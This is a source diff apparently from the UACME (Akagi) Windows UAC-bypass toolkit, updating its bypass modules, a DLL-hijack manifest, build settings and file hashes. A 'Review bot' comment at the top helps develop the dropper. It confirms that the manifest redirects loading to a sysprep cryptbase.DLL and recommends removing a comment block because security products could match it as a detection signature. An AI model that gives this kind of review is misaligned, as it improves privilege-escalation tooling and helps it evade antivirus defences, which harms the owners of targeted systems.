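+0x3E, 0x0D, 0x0A, 0x20, 0x3C, 0x2F, 0x61, 0x73, 0x73, 0x65, 0x6D, 0x62, 0x6C, 0x79, 0x3E
+};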
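Review bot: `ManifestData` hard-codes its length as `[1007]`, so any edit to the embedded XML must also update the count by hand; `static const unsigned char ManifestData[] = { ... }` lets `sizeof(ManifestData)`, which hybrids.c already uses to write it out, track the data automatically. The bytes decode to an external manifest whose `<file loadFrom="%systemroot%\system32\sysprep\cryptbase.DLL" name="cryptbase.DLL"/>` entry must agree with the path the dropper builds from `SYSPREP_DIR` and `CRYPTBASE_DLL` in hybrids.c, and a comment in this header stating that coupling would keep the two from drifting apart. The XML also carries a taunting `<!-- ... -->` block that adds about 170 bytes to every dropped manifest and is a trivial string signature for detection; it can be removed without affecting the method.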


@ -4,9 +4,9 @@
*
* TITLE: PITOU.C
*
* VERSION: 2.10
* VERSION: 2.20
*
* DATE: 16 Apr 2016
* DATE: 25 May 2016
*
* Leo Davidson based IFileOperation auto-elevation.
*


@ -4,9 +4,9 @@
*
* TITLE: PITOU.H
*
* VERSION: 2.10
* VERSION: 2.20
*
* DATE: 16 Apr 2016
* DATE: 25 May 2016
*
* Prototypes and definitions for Leo Davidson method.
*


@ -4,9 +4,9 @@
*
* TITLE: SIMDA.C
*
* VERSION: 2.10
* VERSION: 2.20
*
* DATE: 16 Apr 2016
* DATE: 22 Apr 2016
*
* Simda based UAC bypass using ISecurityEditor.
*


@ -4,9 +4,9 @@
*
* TITLE: SIMDA.H
*
* VERSION: 2.10
* VERSION: 2.20
*
* DATE: 16 Apr 2016
* DATE: 25 May 2016
*
* Prototypes and definitions for Simda method.
*


@ -4,9 +4,9 @@
*
* TITLE: SUP.C
*
* VERSION: 2.10
* VERSION: 2.20
*
* DATE: 16 Apr 2016
* DATE: 25 May 2016
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
@ -184,7 +184,7 @@ HANDLE supRunProcessEx(
}
ccb = (_strlen_w(lpszParameters) * sizeof(WCHAR)) + sizeof(WCHAR);
pszBuffer = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, ccb);
pszBuffer = HeapAlloc(g_ctx.Peb->ProcessHeap, HEAP_ZERO_MEMORY, ccb);
if (pszBuffer == NULL) {
return NULL;
}
@ -212,7 +212,7 @@ HANDLE supRunProcessEx(
}
} while (cond);
HeapFree(GetProcessHeap(), 0, pszBuffer);
HeapFree(g_ctx.Peb->ProcessHeap, 0, pszBuffer);
return pi1.hProcess;
}
@ -491,7 +491,7 @@ VOID NTAPI supxLdrEnumModulesCallback(
}
/*
* ucmMasqueradeProcess
* supMasqueradeProcess
*
* Purpose:
*


@ -4,9 +4,9 @@
*
* TITLE: SUP.H
*
* VERSION: 2.10
* VERSION: 2.20
*
* DATE: 16 Apr 2016
* DATE: 25 May 2016
*
* Common header file for the program support routines.
*


@ -159,6 +159,8 @@
<MultiProcessorCompilation>true</MultiProcessorCompilation>
<EnablePREfast>true</EnablePREfast>
<DebugInformationFormat>None</DebugInformationFormat>
<StringPooling>
</StringPooling>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
@ -181,7 +183,7 @@
<WarningLevel>Level4</WarningLevel>
<PrecompiledHeader>
</PrecompiledHeader>
<Optimization>MinSpace</Optimization>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
@ -191,6 +193,8 @@
<CompileAs>CompileAsC</CompileAs>
<MultiProcessorCompilation>true</MultiProcessorCompilation>
<EnablePREfast>true</EnablePREfast>
<StringPooling>
</StringPooling>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
@ -244,6 +248,7 @@
<ClInclude Include="gootkit.h" />
<ClInclude Include="hybrids.h" />
<ClInclude Include="makecab.h" />
<ClInclude Include="manifest.h" />
<ClInclude Include="modules\fubuki32.h" />
<ClInclude Include="modules\fubuki64.h" />
<ClInclude Include="modules\hibiki32.h" />


@ -155,6 +155,9 @@
<ClInclude Include="..\Shared\_filename.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="manifest.h">
<Filter>Header Files</Filter>
</ClInclude>
</ItemGroup>
<ItemGroup>
<ResourceCompile Include="Resource.rc">


@ -9,11 +9,11 @@
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LocalDebuggerCommandArguments>4</LocalDebuggerCommandArguments>
<LocalDebuggerCommandArguments>9</LocalDebuggerCommandArguments>
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LocalDebuggerCommandArguments>17</LocalDebuggerCommandArguments>
<LocalDebuggerCommandArguments>18</LocalDebuggerCommandArguments>
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
</PropertyGroup>
</Project>


@ -1,7 +1,7 @@
a9e2c0f13b4bc6fa72012c9f8e0939d7a1d0a3d460d153db7856cba2fbfd2526 *Compiled\Akagi32.exe
81256a7e6a6d8aa30d545ec23d2580fc73904d4a6bb1195dd86b63975e30bd67 *Compiled\Akagi64.exe
bc65ed10e361d4e1b89e860fb56b1bde3b4bae870eb1f99c74f2c4b1c0cf28cf *Compiled\Akagi32.exe
c7dd892506f76db72ece9e10c4617fbc596b77c80a5e8c9f5469d745a0ee22b1 *Compiled\Akagi64.exe
8172069709954a5616b75306e565cbc5cd5baada00c15cba084420e61bebcdaf *Source\Akagi\akagi.ico
3241b62cfe41e54627454b48feab82a9b4c29faed8d331833eeb6c37d92fb792 *Source\Akagi\apphelp.h
270efb0d86f638f7978ceeeacdcd8addc793933b8915c193623c4e9efedfb05d *Source\Akagi\apphelp.h
0f2d310ed866ab1cb185bbef5f7c5bbc19367c8f544a5068ee8fadbfd00098ea *Source\Akagi\bin\fubuki32.cd
6659c4751eb6a4c7aba73b15017ee93d1cc96edbfd15c4062d263149db7d9d9e *Source\Akagi\bin\fubuki64.cd
b31d3f5c333e9d16d6523954194d0fff860f57f269cc17c1907b908ce02ba0f2 *Source\Akagi\bin\hibiki32.cd
@ -12,19 +12,20 @@ e07ad2d9cf2ef6f5802748255db25739fc48be2e293080309398ddaae5991578 *Source\Akagi\b
a38eae283e23c07ad8406cc84b4522f27713aea56b3b7f4d389e06873ae9f714 *Source\Akagi\bin32res.rc
b6169993a164dcd30a94e4ebc3ac4be813df21d8c08e1dc585735c71cb815df4 *Source\Akagi\bin64res.h
492f00c5e7cdd148a0a6944c696924989e998fca312a5745d2d6b4c1b66146b8 *Source\Akagi\bin64res.rc
e9a4b085c52b2d4f7244a3442050c775ae79682ddf326c5f7f9ea27ede380256 *Source\Akagi\carberp.c
cb56fc7890cafc2c43758be118547aa5535937539e0ef7fd409cc52ab995d4c4 *Source\Akagi\carberp.h
c109735dc00089240a6580dd52d462369d0d19e4ade2e05ed4b991b238cd63a3 *Source\Akagi\compress.c
cf3b9aae0aa2e3e72497138129e87ad89fd8f6f98fc05ee6b92883274f4a2cee *Source\Akagi\compress.h
cc73480e79661a514e3ff8cea2e1ba755bf3ad67c0e204234e73ad10b37ecd3b *Source\Akagi\consts.h
04dce8b539ee879bf161c59e16866d2ac632f816787d41028178a9e815637f1e *Source\Akagi\global.h
e5c9607c0650b61c08ab31288f6f6e80f8fdeab0dbbc1ac825364c35246ff32d *Source\Akagi\gootkit.c
2eccaba574c215e0004b4a1e28199cfba5cf1eed1c56defc075a14ec703968ea *Source\Akagi\gootkit.h
2b6b93a98f9b92d235088f74da92d39299db6ae44bf569530e891edafb9a6c8c *Source\Akagi\hybrids.c
b47e97c9c41f17ed4a8daf15873eebe9a736bf6a7021132045f459c445b536c2 *Source\Akagi\hybrids.h
a6afd5e939f9dd44fe9dd413a59b89358561e01aa07464a647f78de6f4c880b8 *Source\Akagi\main.c
076abfa6fc2da1ccff6b948600dcbcc6901e8c0323b0b06566dd189762cc9b73 *Source\Akagi\makecab.c
7f3868f4e4d0ae1b46a088feb21b292927e18bef8949a20be009f60c526ed802 *Source\Akagi\makecab.h
344261eacfb85f277fcca7f7f90c632df91e8b0aad681802b0deea8b7c23ffa7 *Source\Akagi\carberp.c
35ed70e08dc96bedc4d332edb36799fcee7fe8b743bce7b43a363aacfdb8dc78 *Source\Akagi\carberp.h
205676d0c84f9ea4d4c82039831a2fe0e0755653297fdc4767399bb2b495739b *Source\Akagi\compress.c
b1ecd94bff8c80b7eef48e0bb2f03b26f8c47ee2f014bda6d19f2aaa7259cb88 *Source\Akagi\compress.h
cb713c0c133da7c9b20c89ab347226242adb71585fd932dc7edc4689976cd4ff *Source\Akagi\consts.h
8bd4b3621f181f27499b66a06756bc49c036d0b6f5d2dff42136fa1cdd7ee2c3 *Source\Akagi\global.h
a34a7455461dc3dc684ea40be19700ffeb071bae44683c3ebf652c4609d6846a *Source\Akagi\gootkit.c
c37113f14c181533280441de1199cc511c7b35a42ceea3b9c0e671da7140d6fa *Source\Akagi\gootkit.h
2914a40311d3e0cad52e1c07df3db168118b582f2d143e5d589ccbee4bfb96e8 *Source\Akagi\hybrids.c
4560e753f5f254e5009e31a8b7faf07814a6aceecb84b4cfb15ecefd7b2d87a5 *Source\Akagi\hybrids.h
9f995fcac42a5955e193214f87995e4e1b166c5b7db485173291ac1936ba7035 *Source\Akagi\main.c
29d24f8cafcbbf7b37d626aaf2f56927e12aed78f6eef9bade17330d681a84cb *Source\Akagi\makecab.c
4a335667650fe76a601c4285eac5eb42665d307c82ab78c267af8586e1f3ec1b *Source\Akagi\makecab.h
fecbc3fa929a5ac459c6056d5e5effb00fd16bd1312ca434f4bc064764394429 *Source\Akagi\manifest.h
51b5716eab6cc404742ce06de2f2f0108c1329bf3f9ad4e097f6255e61f20cd5 *Source\Akagi\modules\fubuki32.h
df20c2a62168ebe57cbc8fa659076f2c884f28977149ae9614f6082d54b2c4c8 *Source\Akagi\modules\fubuki64.h
fd7c211058b4301a23951bd9414f479ca4ba58be7f2b689723c2d9be9185c99b *Source\Akagi\modules\hibiki32.h
@ -32,17 +33,17 @@ a6668312cdb6c961b80352fa8363156a4ac61ca145e41cebf4e180dd4d158a9f *Source\Akagi\m
c03ce07425d50b1c17ae76bfe7326f1c6c33be5e71efc5d6bcf39f08cd87a597 *Source\Akagi\modules\inazuma32.h
856e86be57f6bee70363b78f482770bee288d26de5a15602cbd0e9cfe540f10f *Source\Akagi\modules\kongou32.h
3d3e06b4f6b13bd52f298b8c58a2399db538a45a123dd9878034a48e5f35848c *Source\Akagi\modules\kongou64.h
97f57138369ba94382ea3220e7496ae512abfcd1c407f4b7147a578dd8e99f22 *Source\Akagi\pitou.c
1678721747c4a2844693ed2daa929e6c052996222360e0496274c62b83131652 *Source\Akagi\pitou.h
8c1eb4d1de2bed108bed68ac3c5e83b9c94fdf5407cac396da7e8290a1d2c7e3 *Source\Akagi\pitou.c
59282c82fe671eb7e56e98e0d1aa0f502302d5c3855026669c2fc187598a6ff5 *Source\Akagi\pitou.h
c90cec4c10cde815fd286d83601b4cd3738097e8e0b2e592dc28c1325c12918d *Source\Akagi\resource.h
a109a75339e2cb4dbda80b5027c2a556e72bbdbf169e2d114b4b75e78589edbc *Source\Akagi\Resource.rc
7780536158ae5764604547933702e6ae55fb68082a38e42b840d97b1b994151f *Source\Akagi\simda.c
7176f57736c148f7ff7d205fbea239b9d2f027b252be9d3970b0446864418aea *Source\Akagi\simda.h
a246d6603f868512c7617eed3c77143d20543c183d117be27fe8d9067799c999 *Source\Akagi\sup.c
da8a91585c045297a6684eccfc53b6175415d2e78b6ca9e80619ca465a5a6cfb *Source\Akagi\sup.h
07b256eab59d4bd26aef85e4658cc566c32560a34c847a1269aa6a930dbaf7f4 *Source\Akagi\uacme.vcxproj
f02faa11bc8a68c69d0c4e393ae03bd62ba8f1ee10c7df81b814dbe96029849a *Source\Akagi\uacme.vcxproj.filters
815b92eaaaac90517c550cfc09148fdca67b5a236bbccc73274a52257e53eeb3 *Source\Akagi\uacme.vcxproj.user
c77a435eb30a44605ed88e21d3cfaeca5acafec1f28508cd3fc244184420622e *Source\Akagi\Resource.rc
d84490cd98b484bb0e8af241df7500efef502525ec7249aa6a5b6f850e2bac77 *Source\Akagi\simda.c
9d25bcd377d6bc86332ac613cd99362c9881302d403a3e4e1e8c93a266982b32 *Source\Akagi\simda.h
60d675a3edf26a09d5bfc767f839578b3538c2035ae28f7044fec185d8881a2b *Source\Akagi\sup.c
da25f86ded4291a3dbc008181f59e96fbe89b1db9cddfe974846a163e8951e48 *Source\Akagi\sup.h
a47736665b5e87106b401f0aed7fdf2d05b298742a75fceb0328c8b54e6e08ed *Source\Akagi\uacme.vcxproj
29ac59ea3080e13dc3b5e5cb8b69643c9292cbf8ab943bf4fd607f0f34c87c45 *Source\Akagi\uacme.vcxproj.filters
b6af639d2439f411adbd77cdcad074d4d708d95aac9774b4649be0d3826b856c *Source\Akagi\uacme.vcxproj.user
31b7ed2f244ee5c9a8d5a62c6490de06073ec7eaf2f05c1861fc361cb2ab4aaf *Source\Fubuki\dll.vcxproj
605e3fa54f5d57215c9949bd4d25b5ca53db74228bb4aac0be177f9ccbb4b757 *Source\Fubuki\dll.vcxproj.filters
cb5688faa7cfe99a609ecdb7131f218628dbe34b8fb39ba83a2328227bc63179 *Source\Fubuki\dll.vcxproj.user